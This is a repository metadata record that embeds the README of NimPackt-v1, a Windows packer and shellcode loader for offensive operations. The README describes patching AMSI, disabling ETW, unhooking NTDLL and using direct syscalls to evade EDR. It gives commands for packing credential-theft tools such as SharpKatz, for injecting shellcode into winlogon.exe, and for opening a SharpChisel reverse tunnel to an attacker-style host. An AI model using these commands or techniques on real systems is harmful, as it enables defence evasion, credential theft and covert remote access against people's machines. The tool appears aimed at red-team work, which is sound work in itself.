{"id":13843808,"url":"https://github.com/chvancooten/NimPackt-v1","last_synced_at":"2025-07-11T20:30:42.705Z","repository":{"id":37361862,"uuid":"452001014","full_name":"chvancooten/NimPackt-v1","owner":"chvancooten","description":"Nim-based assembly packer and shellcode loader for opsec \u0026 profit","archived":false,"fork":false,"pushed_at":"2023-02-24T16:06:21.000Z","size":365,"stargazers_count":458,"open_issues_count":1,"forks_count":79,"subscribers_count":12,"default_branch":"main","last_synced_at":"2024-11-07T18:25:37.755Z","etag":null,"topics":["hacktoberfest"],"latest_commit_sha":null,"homepage":"","language":"Nim","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/chvancooten.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null},"funding":{"github":["chvancooten"]}},"created_at":"2022-01-25T18:45:59.000Z","updated_at":"2024-11-05T13:13:32.000Z","dependencies_parsed_at":"2024-02-08T21:11:44.162Z","dependency_job_id":null,"html_url":"https://github.com/chvancooten/NimPackt-v1","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chvancooten%2FNimPackt-v1","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chvancooten%2FNimPackt-v1/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chvancooten%2FNimPackt-v1/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/chvancooten%2FNimPackt-v1/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/chv
ancooten","download_url":"https://codeload.github.com/chvancooten/NimPackt-v1/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225755160,"owners_count":17519215,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hacktoberfest"],"created_at":"2024-08-04T17:02:27.726Z","updated_at":"2024-11-21T15:31:33.910Z","avatar_url":"https://github.com/chvancooten.png","language":"Nim","funding_links":["https://github.com/sponsors/chvancooten"],"categories":["Nim"],"sub_categories":[],"readme":"![NimPackt](assets/Nimpackt-Logo-Blacktext.png)\n\n# A Nim-based packer for .NET executables and raw shellcode\n\n*By **Cas van Cooten** ([@chvancooten](https://twitter.com/chvancooten))*\n\n*With special thanks to Marcello Salvati ([@byt3bl33der](https://twitter.com/byt3bl33d3r)) and Fabian Mosch ([@S3cur3Th1sSh1t](https://twitter.com/ShitSecure))*\n\n## Description\n\n**Update:** _NimPackt-v1 is among the worst code I have ever written (I was just starting out learning Nim). Because of this, I started on a full rewrite of NimPackt, dubbed 'NimPackt-NG' (currently still private). With this re-write, I decided to open-source the old branch (\"NimPackt-v1\"). As such, this branch is no longer maintained and comes without any form of warranty or support. PRs are always welcome, of course :)_\n\nNimPackt is a Nim-based packer for .NET (C#) executables and shellcode targeting Windows. It automatically wraps the payload in a Nim binary that is compiled to Native C and as such harder to detect and reverse engineer. 
There are two main execution methods: \n- `Execute-Assembly` re-packs a .NET executable and runs it, optionally applying evasive measures such as API unhooking, AMSI patching, or disabling ETW.\n- `Shinject` takes a .bin file with raw, position-independent shellcode and executes it locally or in a remote process, optionally using direct syscalls to trigger the shellcode or patching API hooks to evade EDR.\n\nCurrently, NimPackt has the following features.\n\n- Uses static syscalls to execute the payload and evade EDR\n- Unhooks user-mode APIs for the spawned thread by refreshing `NTDLL.dll` using [ShellyCoat](https://github.com/slaeryan/AQUARMOURY/tree/master/Shellycoat)\n- Patches Event Tracing for Windows (ETW)\n- Patches the Anti-Malware Scan Interface (AMSI)\n- AES-encrypts the payload with a random key to prevent static analysis or fingerprinting\n- Compiles to `exe` or `dll`\n- Supports cross-platform compilation (from both Linux and Windows)\n- Integrates with CobaltStrike for ezpz payload generation 😎\n\nA great source for C#-based binaries for offensive tooling can be found [here](https://github.com/Flangvik/SharpCollection). It is highly recommended to compile the C# binaries yourself. Even though embedded binaries are encrypted, you should obfuscate sensitive binaries (such as Mimikatz) to lower the risk of detection.\n\n## Installation\n\n\u003e If you are having issues compiling the binary with Syscalls, try downgrading your GCC to version 8.1.0 (especially on Windows). ALWAYS test generated payloads!\n\nOn **Linux**, simply install the required system packages, then install the Python libraries with pip and the Nim packages with Nimble.\n\n```\nsudo apt install -y python3 mingw-w64 nim\npip3 install pycryptodome argparse\nnimble install winim nimcrypto\n```\n\nOn **Windows**, execute the Nim installer from [here](https://nim-lang.org/install_windows.html). 
Make sure to install `mingw` and set the path values correctly using the provided `finish.exe` utility. If you don't have Python3, install that first, then install the required packages as follows.\n\n```\nnimble install winim nimcrypto\npip3 install pycryptodome argparse\n```\n\n### Docker\n\nThe Docker image [chvancooten/nimbuild](https://hub.docker.com/r/chvancooten/nimbuild) can be used to compile NimPackt-v1 binaries. Using Docker is easy and avoids dependency issues, as all required dependencies are pre-installed in this container.\n\nTo use it, install Docker for your OS and ensure the input shellcode is in the current folder. Then, start the compilation in a container as follows.\n\n```bash\ndocker run --rm -v `pwd`:/usr/src/np -w /usr/src/np chvancooten/nimbuild python3 NimPackt.py -e shinject -i sc.bin\n```\n\n### CobaltStrike Plugin\n\nTo install the CobaltStrike plugin, select `Cobalt Strike` -\u003e `Script Manager` from the menu bar, and select `Load`. Make sure to load the `.cna` file from its original location, otherwise it won't be able to find the NimPackt script files!\n\n![NimPackt](assets/cna_plugin.png)\n\n\n## Usage\n\n```\nusage: NimPackt.py [-h] -e EXECUTIONMODE -i INPUTFILE [-a ARGUMENTS] [-na] [-ne] [-r]\n                   [-t INJECTTARGET] [-E] [-o OUTPUTFILE] [-nu] [-ns] [-f FILETYPE] [-s] [-32] [-S]\n                   [-d] [-v] [-V]\n\nrequired arguments:\n  -e EXECUTIONMODE, --executionmode EXECUTIONMODE\n                        Execution mode of the packer. 
Supports \"execute-assembly\" or \"shinject\"\n  -i INPUTFILE, --inputfile INPUTFILE\n                        C# .NET binary executable (.exe) or shellcode (.bin) to wrap\n\nexecute-assembly arguments:\n  -a ARGUMENTS, --arguments ARGUMENTS\n                        Arguments to \"bake into\" the wrapped binary, or \"PASSTHRU\" to accept run-\n                        time arguments (default)\n  -na, --nopatchamsi    Do NOT patch (disable) the Anti-Malware Scan Interface (AMSI)\n  -ne, --nodisableetw   Do NOT disable Event Tracing for Windows (ETW)\n\nshinject arguments:\n  -r, --remote          Inject shellcode into remote process (default false)\n  -t INJECTTARGET, --target INJECTTARGET\n                        Remote thread targeted for remote process injection\n  -E, --existing        Remote inject into existing process rather than a newly spawned one (default\n                        false, implies -r) (WARNING: VOLATILE)\n\nother arguments:\n  -o OUTPUTFILE, --outfile OUTPUTFILE\n                        Filename of the output file (e.g. \"LegitBinary\"). Specify WITHOUT extension\n                        or path. This property will be stored in the output binary as the original\n                        filename\n  -nu, --nounhook       Do NOT unhook user-mode API hooks in the target process by loading a fresh\n                        NTDLL.dll\n  -ns, --nosyscalls     Do NOT use direct syscalls (Windows generation 7-10) instead of high-level\n                        APIs to evade EDR\n  -f FILETYPE, --filetype FILETYPE\n                        Filetype to compile (\"exe\" or \"dll\", default: \"exe\")\n  -s, --sleep           Sleep for approx. 
30 seconds by calculating primes\n  -32, --32bit          Compile in 32-bit mode (untested)\n  -S, --showConsole     Show a console window with the app's output when running\n  -d, --debug           Enable debug mode (retains .nim source file in output folder)\n  -v, --verbose         Print debug messages of the wrapped binary at runtime\n  -V, --version         show program's version number and exit\n```\n\n**Examples:**\n\n```bash\n# Pack SharpKatz to accept arguments at runtime, patching NTDLL hooks, AMSI, and ETW while printing verbose messages to a visible console at runtime\npython3 ./NimPackt.py -e execute-assembly -i bins/SharpKatz-x64.exe -S -v\n\n# Pack Seatbelt as a DLL file with baked-in arguments (note: write to outfile because stdout is not available for DLLs)\npython3 ./NimPackt.py -f dll -e execute-assembly -i Seatbelt.exe -a \"-group=all -outputfile=c:\\users\\public\\downloads\\sb.txt\"\n\n# Pack SharpChisel with a built-in ChiselChief connection string, do not unhook, patch AMSI, or disable ETW, hide the application window at runtime\npython3 NimPackt.py -nu -na -ne -e execute-assembly -i bins/SharpChisel.exe -a 'client --keepalive 25s --max-retry-interval 25s https://chiselserver.evilwebsite.com R:10073:socks'\n\n# Pack raw shellcode to DLL file that executes in the local thread through direct syscalls, unhooking NTDLL as well\n# Shellcode generated with 'msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o /tmp/calc.bin'\npython3 NimPackt.py -i calc.bin -e shinject -f dll\n\n# Pack raw shellcode to execute in a newly spawned Calculator thread in an invisible window\npython3 NimPackt.py -i calc.bin -e shinject -t \"calc.exe\"\n\n# Pack raw shellcode to execute in the existing Winlogon process (first PID with name 'winlogon.exe'), do not use direct syscalls or unhook NTDLL\npython3 NimPackt.py -i calc.bin -e shinject -r -E -t \"winlogon.exe\" -nu -ns\n```\n\nBinaries are stored in the `output` subfolder of your installation directory. 
Generated `dll` files can be executed as follows (entry point can be changed in the Nim template):\n\n```powershell\nrundll32 exampleShinjectNimPackt.dll,IconSrv\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchvancooten%2FNimPackt-v1","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fchvancooten%2FNimPackt-v1","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fchvancooten%2FNimPackt-v1/lists"}